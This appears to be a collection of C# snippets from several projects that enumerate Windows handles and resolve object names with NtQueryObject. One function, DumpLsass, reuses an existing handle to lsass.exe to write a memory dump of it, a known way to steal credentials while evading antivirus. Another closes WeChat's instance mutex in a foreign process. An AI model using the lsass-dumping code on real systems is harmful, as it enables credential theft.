/// <summary> /// Retrieves the name of the object referenced by the specified handle using NtQueryObject. /// </summary> private static string GetHandleObjectName(IntPtr handle, uint pid) { IntPtr duplicatedHandle; if (!DuplicateHandle(handle, pid, out duplicatedHandle)) { return(null); } int length = Marshal.SizeOf(typeof(OBJECT_NAME_INFORMATION)) + 256, dummy; IntPtr buffer = Marshal.AllocHGlobal(length); try { NtStatus status = NtQueryObject(duplicatedHandle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, buffer, length, out dummy); if (status == NtStatus.Success) { OBJECT_NAME_INFORMATION info = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(buffer, typeof(OBJECT_NAME_INFORMATION)); return(info.Name.ToString()); } } finally { Marshal.FreeHGlobal(buffer); CloseHandle(duplicatedHandle); } return(null); }
public static void FindAndCloseWeChatMutexHandle(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process) { IntPtr ipHandle = IntPtr.Zero; IntPtr openProcessHandle = IntPtr.Zero; IntPtr hObjectName = IntPtr.Zero; try { PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead; openProcessHandle = OpenProcess(flags, false, process.Id); // 通过 DuplicateHandle 访问句柄 if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return; } int nLength = 0; hObjectName = Marshal.AllocHGlobal(256 * 1024); // 查询句柄名称 while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(hObjectName); if (nLength == 0) { Console.WriteLine("Length returned at zero!"); return; } hObjectName = Marshal.AllocHGlobal(nLength); } OBJECT_NAME_INFORMATION objObjectName = new OBJECT_NAME_INFORMATION(); objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(hObjectName, objObjectName.GetType()); if (objObjectName.Name.Buffer != IntPtr.Zero) { string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); Console.WriteLine(strObjectName); // \Sessions\1\BaseNamedObjects\_WeChat_App_Instance_Identity_Mutex_Name if (strObjectName.Contains("_Instance_Identity_Mutex_Name")) { // 通过 DuplicateHandle DUPLICATE_CLOSE_SOURCE 关闭句柄 IntPtr mHandle = IntPtr.Zero; if (DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out mHandle, 0, false, DUPLICATE_CLOSE_SOURCE)) { CloseHandle(mHandle); } } } } catch (Exception ex) { Console.WriteLine(ex.Message); } finally { Marshal.FreeHGlobal(hObjectName); CloseHandle(ipHandle); CloseHandle(openProcessHandle); } }
public static void DumpLsass(SYSTEM_HANDLE_INFORMATION handleInfo, string FileName) { // Code for getting handles was found here https://stackoverflow.com/questions/54872228/c-sharp-how-to-find-all-handles-associated-with-current-process // idea for getting existing handles to dump lsass found here https://skelsec.medium.com/duping-av-with-handles-537ef985eb03 IntPtr ipHandle = IntPtr.Zero; IntPtr openProcessHandle = IntPtr.Zero; IntPtr hObjectName = IntPtr.Zero; PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead; openProcessHandle = OpenProcess(flags, false, (int)handleInfo.ProcessID); bool test = DuplicateHandle(openProcessHandle, new IntPtr(handleInfo.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS); int pLength = 0; hObjectName = Marshal.AllocHGlobal(256 * 1024); while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectTypeInformation, hObjectName, pLength, ref pLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(hObjectName); if (pLength == 0) { Console.WriteLine("Length returned at zero!"); } hObjectName = Marshal.AllocHGlobal(pLength); } OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName); if (objObjectName.Name.Buffer != IntPtr.Zero) { string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); if (strObjectName == "Process") { int max = 1024; StringBuilder str = new StringBuilder(max); QueryFullProcessImageName(ipHandle, 0, str, ref max); if (str.ToString().Contains("lsass.exe")) { Console.WriteLine("[+] Found open handle to lass: " + ipHandle); FileStream dumpFile = new FileStream(FileName, FileMode.Create); Console.WriteLine("[+] Attempting to dump lsass with handle..."); bool dumped = MiniDumpWriteDump(ipHandle, handleInfo.ProcessID, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); dumpFile.Close(); if (dumped == true) { Console.WriteLine("[+] Dumped lsass"); System.Environment.Exit(1); } } } } }
public static void NtQueryObject(IntPtr Handle, out OBJECT_NAME_INFORMATION ObjectNameInformation) { IntPtr buffer = Marshal.AllocHGlobal(1024); try{ Ntdll.NtQueryObject(Handle, 1, buffer, 1024); ObjectNameInformation = Marshal.PtrToStructure <Ntdll.OBJECT_NAME_INFORMATION>(buffer); }finally{ Marshal.FreeHGlobal(buffer); } }
public OBJECT_NAME_INFORMATION GetHandleNameInfo(int pid, UInt16 handle, OBJECT_BASIC_INFORMATION obi) { // 枚举进程句柄 - xbgprogrammer的专栏 - 博客频道 - CSDN.NET // http://blog.csdn.net/xbgprogrammer/article/details/26386733 // HOWTO: Enumerate handles - Sysinternals Forums // http://forum.sysinternals.com/howto-enumerate-handles_topic18892.html if (MAGIC_FLAG == (MAGIC_FLAG & obi.GrantedAccess)) { return(default(OBJECT_NAME_INFORMATION)); } IntPtr src_proc_handle = OpenProcess(PROCESS_DUP_HANDLE, 0, pid); if (IntPtr.Zero == src_proc_handle) { return(default(OBJECT_NAME_INFORMATION)); } IntPtr target_handle = IntPtr.Zero; if (STATUS_SUCCESS != NtDuplicateObject( src_proc_handle, (IntPtr)handle, GetCurrentProcess(), ref target_handle, 0, 0, DUPLICATE_SAME_ACCESS)) { CloseHandle(src_proc_handle); return(default(OBJECT_NAME_INFORMATION)); } int ret_obj_len = 0; int obj_len = obi.NameInformationLength + 2; // sizeof(EOF) = sizeof('\0\0') = 2 byte[] bytes_obj_info = new byte[obj_len]; uint ret = NtQueryObject(target_handle, ObjectNameInformation, bytes_obj_info, obj_len, ref ret_obj_len); if (STATUS_SUCCESS != ret) { CloseHandle(target_handle); CloseHandle(src_proc_handle); return(default(OBJECT_NAME_INFORMATION)); } GCHandle gch = GCHandle.Alloc(bytes_obj_info, GCHandleType.Pinned); OBJECT_NAME_INFORMATION oni = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(gch.AddrOfPinnedObject(), typeof(OBJECT_NAME_INFORMATION)); gch.Free(); CloseHandle(target_handle); CloseHandle(src_proc_handle); return(oni); }
private static bool GetFileNameFromHandle(IntPtr handle, out string fileName) { IntPtr ptr = IntPtr.Zero; RuntimeHelpers.PrepareConstrainedRegions(); try { int length = 0x200; // 512 bytes RuntimeHelpers.PrepareConstrainedRegions(); try { } finally { // CER guarantees the assignment of the allocated // memory address to ptr, if an ansynchronous exception // occurs. ptr = Marshal.AllocHGlobal(length); } NT_STATUS ret = NativeMethods.NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, length, out length); if (ret == NT_STATUS.STATUS_BUFFER_OVERFLOW) { RuntimeHelpers.PrepareConstrainedRegions(); try { } finally { // CER guarantees that the previous allocation is freed, // and that the newly allocated memory address is // assigned to ptr if an asynchronous exception occurs. Marshal.FreeHGlobal(ptr); ptr = Marshal.AllocHGlobal(length); } ret = NativeMethods.NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, length, out length); } if (ret == NT_STATUS.STATUS_SUCCESS) { OBJECT_NAME_INFORMATION objNameInfo = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ptr, typeof(OBJECT_NAME_INFORMATION)); fileName = objNameInfo.Name.Buffer; return(fileName.Length != 0); } } finally { // CER guarantees that the allocated memory is freed, // if an asynchronous exception occurs. Marshal.FreeHGlobal(ptr); } fileName = string.Empty; return(false); }
private static string GetFilePath(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process) { IntPtr ipHandle = IntPtr.Zero; IntPtr openProcessHandle = IntPtr.Zero; IntPtr hObjectName = IntPtr.Zero; try { PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead; openProcessHandle = OpenProcess(flags, false, process.Id); if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(null); } if (GetFileType(ipHandle) != FileType.FileTypeDisk) { return(null); } int nLength = 0; hObjectName = Marshal.AllocHGlobal(256 * 1024); while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(hObjectName); if (nLength == 0) { Console.WriteLine("Length returned at zero!"); return(null); } hObjectName = Marshal.AllocHGlobal(nLength); } OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName); if (objObjectName.Name.Buffer != IntPtr.Zero) { string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); return(GetRegularFileNameFromDevice(strObjectName)); } } catch (Exception ex) { Console.WriteLine(ex.Message); } finally { Marshal.FreeHGlobal(hObjectName); CloseHandle(ipHandle); CloseHandle(openProcessHandle); } return(null); }
private static void GetObjectNameFromHandleFunc(object obj) { FileNameFromHandleState state = obj as FileNameFromHandleState; int guessSize = 1024; NT_STATUS ret; IntPtr ptr = Marshal.AllocHGlobal(guessSize); try { while (true) { ret = NativeMethods.NtQueryObject(state.Handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, guessSize, out int requiredSize); if (ret == NT_STATUS.STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(ptr); guessSize = requiredSize; ptr = Marshal.AllocHGlobal(guessSize); continue; } if (ret == NT_STATUS.STATUS_SUCCESS) { OBJECT_NAME_INFORMATION oti = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ptr, typeof(OBJECT_NAME_INFORMATION)); state.FileName = oti.Name.GetText(); return; } break; } } finally { if (ptr != IntPtr.Zero) { Marshal.FreeHGlobal(ptr); } state.Set(); } }
private static Device GetHandleName(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process, int count, int handleCount) { IntPtr ipHandle = IntPtr.Zero; IntPtr openProcessHandle = IntPtr.Zero; IntPtr hObjectName = IntPtr.Zero; Device IDFound = null; Int32 accessMask = (Int32)systemHandleInformation.AccessMask; if (systemHandleInformation.ProcessID != process.Id || accessMask == 0x0012019f || accessMask == 0x001a019f || accessMask == 0x00120189 || accessMask == 0x00100000) { return(IDFound); } try { //Set up flags for and then get a process handle for the current process being checked PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead; openProcessHandle = OpenProcess(flags, false, process.Id); //Duplicate the process handle into ipHandle, if this fails return null if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(IDFound); } int nLength = 0; hObjectName = Marshal.AllocHGlobal(256 * 1024); //Allocate memory for a max length handle name //Try to find out exactly how long the object name is, then once you've allocated the proper amount of memory, copy it into hObjectName while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(hObjectName); if (nLength == 0) { Console.WriteLine("Length returned at zero!"); return(IDFound); } hObjectName = Marshal.AllocHGlobal(nLength); } //Move the infromation in hObjectName to an easier to use structure OBJECT_NAME_INFORMATION OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName); //Check if we have a proper name if (objObjectName.Name.Buffer != IntPtr.Zero) { //Convert objObjectName to a normal string, this is the handle's name string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); bool deviceIDFound = false; //Check the handle name for if it contains anything releveant (in this case it's checking for a device ID) if it does, return it foreach (Device device in deviceList) { if (strObjectName.ToLower().Contains(device.PNPDeviceIDSubstring.ToLower())) { IDFound = device; deviceIDFound = true; } } if (deviceIDFound) { //Console.WriteLine("Handle matched!!!\n\n\nProcess Name: " + process.ProcessName + "strObjectName: " + strObjectName + "\nid: " + IDFound + "\n\n\n"); } else { //If it doesnt, return null //Console.WriteLine("(" + count + " / " + handleCount + "): " + strObjectName); } } } catch (Exception ex) { Console.WriteLine(ex.Message); } finally { //Clean up managed memory Marshal.FreeHGlobal(hObjectName); CloseHandle(ipHandle); CloseHandle(openProcessHandle); } return(IDFound); }
public static string GetObjectName(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handle) { IntPtr _processHandle = NativeMethods.OpenProcess(ProcessAccessFlags.All, false, handle.UniqueProcessId); IntPtr _handle = IntPtr.Zero; try { if (!NativeMethods.DuplicateHandle(_processHandle, handle.HandleValue, NativeMethods.GetCurrentProcess(), out _handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS)) { return(null); } IntPtr _basic = IntPtr.Zero; int nameLength = 0; try { OBJECT_BASIC_INFORMATION basicInfo = new OBJECT_BASIC_INFORMATION(); _basic = Marshal.AllocHGlobal(Marshal.SizeOf(basicInfo)); NativeMethods.NtQueryObject(_handle, (int)ObjectInformationClass.ObjectBasicInformation, _basic, Marshal.SizeOf(basicInfo), ref nameLength); basicInfo = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(_basic, basicInfo.GetType()); nameLength = basicInfo.NameInformationLength; } finally { if (_basic != IntPtr.Zero) { Marshal.FreeHGlobal(_basic); } } if (nameLength == 0) { return(null); } OBJECT_NAME_INFORMATION nameInfo = new OBJECT_NAME_INFORMATION(); IntPtr _objectName = Marshal.AllocHGlobal(nameLength); try { while (NativeMethods.NtQueryObject(_handle, (int)ObjectInformationClass.ObjectNameInformation, _objectName, nameLength, ref nameLength) == NtStatus.InfoLengthMismatch) { Marshal.FreeHGlobal(_objectName); _objectName = Marshal.AllocHGlobal(nameLength); } nameInfo = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(_objectName, nameInfo.GetType()); } finally { Marshal.FreeHGlobal(_objectName); } try { return(Marshal.PtrToStringUni(nameInfo.Name.Buffer, nameInfo.Name.Length >> 1)); } catch (Exception e) { Util.Logging.Log(e); } return(null); } finally { if (_handle != IntPtr.Zero) //moved from Marshal.FreeHGlobal(_objectName); { NativeMethods.CloseHandle(_handle); } if (_processHandle != IntPtr.Zero) { NativeMethods.CloseHandle(_processHandle); } } }
public static string GetObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process) { IntPtr m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id); IntPtr ipHandle = IntPtr.Zero; var objBasic = new OBJECT_BASIC_INFORMATION(); IntPtr ipBasic = IntPtr.Zero; var objObjectName = new OBJECT_NAME_INFORMATION(); IntPtr ipObjectName = IntPtr.Zero; string strObjectName = ""; int nLength = 0; int nReturn = 0; IntPtr ipTemp = IntPtr.Zero; if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(null); } ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic)); NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation, ipBasic, Marshal.SizeOf(objBasic), ref nLength); objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType()); Marshal.FreeHGlobal(ipBasic); nLength = objBasic.NameInformationLength; ipObjectName = Marshal.AllocHGlobal(nLength); while ((uint)(nReturn = NtQueryObject( ipHandle, (int)ObjectInformationClass.ObjectNameInformation, ipObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(ipObjectName); ipObjectName = Marshal.AllocHGlobal(nLength); } objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType()); if (Is64Bits()) { ipTemp = ipObjectName + 16; } else { ipTemp = objObjectName.Name.Buffer; } if (ipTemp != IntPtr.Zero) { var baTemp2 = new byte[nLength]; try { Marshal.Copy(ipTemp, baTemp2, 0, nLength); strObjectName = Marshal.PtrToStringUni(ipTemp); //strObjectName = Encoding.Unicode.GetString (baTemp2); return(strObjectName); } catch (AccessViolationException) { return(null); } finally { Marshal.FreeHGlobal(ipObjectName); CloseHandle(ipHandle); } } return(null); }
public static string GetObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process) { var m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id); var objBasic = new OBJECT_BASIC_INFORMATION(); var objObjectName = new OBJECT_NAME_INFORMATION(); int nLength = 0; if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(), out IntPtr ipHandle, 0, false, 0x2)) { return(null); } var ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic)); NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation, ipBasic, Marshal.SizeOf(objBasic), ref nLength); objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType()); Marshal.FreeHGlobal(ipBasic); nLength = objBasic.NameInformationLength; IntPtr ipObjectName = Marshal.AllocHGlobal(nLength); while ((uint)(_ = NtQueryObject( ipHandle, (int)ObjectInformationClass.ObjectNameInformation, ipObjectName, nLength, ref nLength)) == 0xC0000004) { Marshal.FreeHGlobal(ipObjectName); ipObjectName = Marshal.AllocHGlobal(nLength); } objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType()); IntPtr ipTemp; if (Is64Bits()) { ipTemp = new IntPtr(Convert.ToInt64(objObjectName.Name.Buffer.ToString(), 10) >> 32); } else { ipTemp = objObjectName.Name.Buffer; } if (ipTemp != IntPtr.Zero) { byte[] baTemp2 = new byte[nLength]; try { Marshal.Copy(ipTemp, baTemp2, 0, nLength); string strObjectName = Marshal.PtrToStringUni(Is64Bits() ? new IntPtr(ipTemp.ToInt64()) : new IntPtr(ipTemp.ToInt32())); return(strObjectName); } catch (AccessViolationException) { return(null); } finally { Marshal.FreeHGlobal(ipObjectName); CloseHandle(ipHandle); } } return(null); }
private static bool GetFileNameOfLocalHandle(IntPtr handle, out string fileName) { if (handle.ToInt32() == 0) { throw new Exception("Handle is null"); } IntPtr ptr = IntPtr.Zero; RuntimeHelpers.PrepareConstrainedRegions(); try { int length = 0x200; // 512 bytes RuntimeHelpers.PrepareConstrainedRegions(); try { } finally { // CER guarantees the assignment of the allocated // memory address to ptr, if an ansynchronous exception // occurs. ptr = Marshal.AllocHGlobal(length); } NT_STATUS ret = NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, length, out length); if (ret == NT_STATUS.STATUS_BUFFER_OVERFLOW) { RuntimeHelpers.PrepareConstrainedRegions(); try { } finally { // CER guarantees that the previous allocation is freed, // and that the newly allocated memory address is // assigned to ptr if an asynchronous exception occurs. Marshal.FreeHGlobal(ptr); ptr = Marshal.AllocHGlobal(length); } ret = NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, length, out length); } if (ret == NT_STATUS.STATUS_SUCCESS) { // fileName = Marshal.PtrToStringUni((IntPtr)((int)ptr + 16), (length - 9) / 2); OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(ptr); if (objObjectName.Name.Buffer != IntPtr.Zero) { string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); fileName = GetRegularFileNameFromDevice(strObjectName); //return strObjectName; } else { fileName = string.Empty; } return(fileName.Length != 0); } } finally { // CER guarantees that the allocated memory is freed, // if an asynchronous exception occurs. Marshal.FreeHGlobal(ptr); } fileName = string.Empty; return(false); }
private static string GetObjectName(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handle) { IntPtr _processHandle = OpenProcess(ProcessAccessFlags.All, false, handle.UniqueProcessId); IntPtr _handle = IntPtr.Zero; try { if (!DuplicateHandle(_processHandle, handle.HandleValue, GetCurrentProcess(), out _handle, 0, false, DUPLICATE_SAME_ACCESS)) return null; IntPtr _basic = IntPtr.Zero; int nameLength = 0; try { OBJECT_BASIC_INFORMATION basicInfo = new OBJECT_BASIC_INFORMATION(); _basic = Marshal.AllocHGlobal(Marshal.SizeOf(basicInfo)); NtQueryObject(_handle, (int)ObjectInformationClass.ObjectBasicInformation, _basic, Marshal.SizeOf(basicInfo), ref nameLength); basicInfo = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(_basic, basicInfo.GetType()); nameLength = basicInfo.NameInformationLength; } finally { if (_basic != IntPtr.Zero) Marshal.FreeHGlobal(_basic); } if (nameLength == 0) { return null; } OBJECT_NAME_INFORMATION nameInfo = new OBJECT_NAME_INFORMATION(); IntPtr _objectName = Marshal.AllocHGlobal(nameLength); try { while ((uint)(NtQueryObject(_handle, (int)ObjectInformationClass.ObjectNameInformation, _objectName, nameLength, ref nameLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(_objectName); _objectName = Marshal.AllocHGlobal(nameLength); } nameInfo = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(_objectName, nameInfo.GetType()); } finally { Marshal.FreeHGlobal(_objectName); CloseHandle(_handle); } try { return Marshal.PtrToStringUni(nameInfo.Name.Buffer, nameInfo.Name.Length >> 1); } catch { } return null; } finally { if (_processHandle != IntPtr.Zero) CloseHandle(_processHandle); } }
public static string getObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process) { var m_ipProcessHwnd = Native.OpenProcess((int)ProcessAccessFlags.All, false, process.Id); var ipHandle = IntPtr.Zero; var objBasic = new OBJECT_BASIC_INFORMATION(); var ipBasic = IntPtr.Zero; var ipObjectType = IntPtr.Zero; var objObjectName = new OBJECT_NAME_INFORMATION(); var ipObjectName = IntPtr.Zero; var nLength = 0; var nReturn = 0; var ipTemp = IntPtr.Zero; if (!Native.DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, Native.GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(null); } ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic)); Native.NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation, ipBasic, Marshal.SizeOf(objBasic), ref nLength); objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType()); Marshal.FreeHGlobal(ipBasic); nLength = objBasic.NameInformationLength; ipObjectName = Marshal.AllocHGlobal(nLength); while ((uint)(nReturn = Native.NtQueryObject( ipHandle, (int)ObjectInformationClass.ObjectNameInformation, ipObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(ipObjectName); ipObjectName = Marshal.AllocHGlobal(nLength); } objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType()); ipTemp = Is64Bits() ? new IntPtr(Convert.ToInt64(objObjectName.Name.Buffer.ToString(), 10) >> 32) : objObjectName.Name.Buffer; if (ipTemp != IntPtr.Zero) { var baTemp2 = new byte[nLength]; try { Marshal.Copy(ipTemp, baTemp2, 0, nLength); var strObjectName = Marshal.PtrToStringUni(Is64Bits() ? new IntPtr(ipTemp.ToInt64()) : new IntPtr(ipTemp.ToInt32())); return(strObjectName); } catch (AccessViolationException) { Console.WriteLine("[WARNING] Access violation!"); return(null); } finally { Marshal.FreeHGlobal(ipObjectName); Native.CloseHandle(ipHandle); } } return(null); }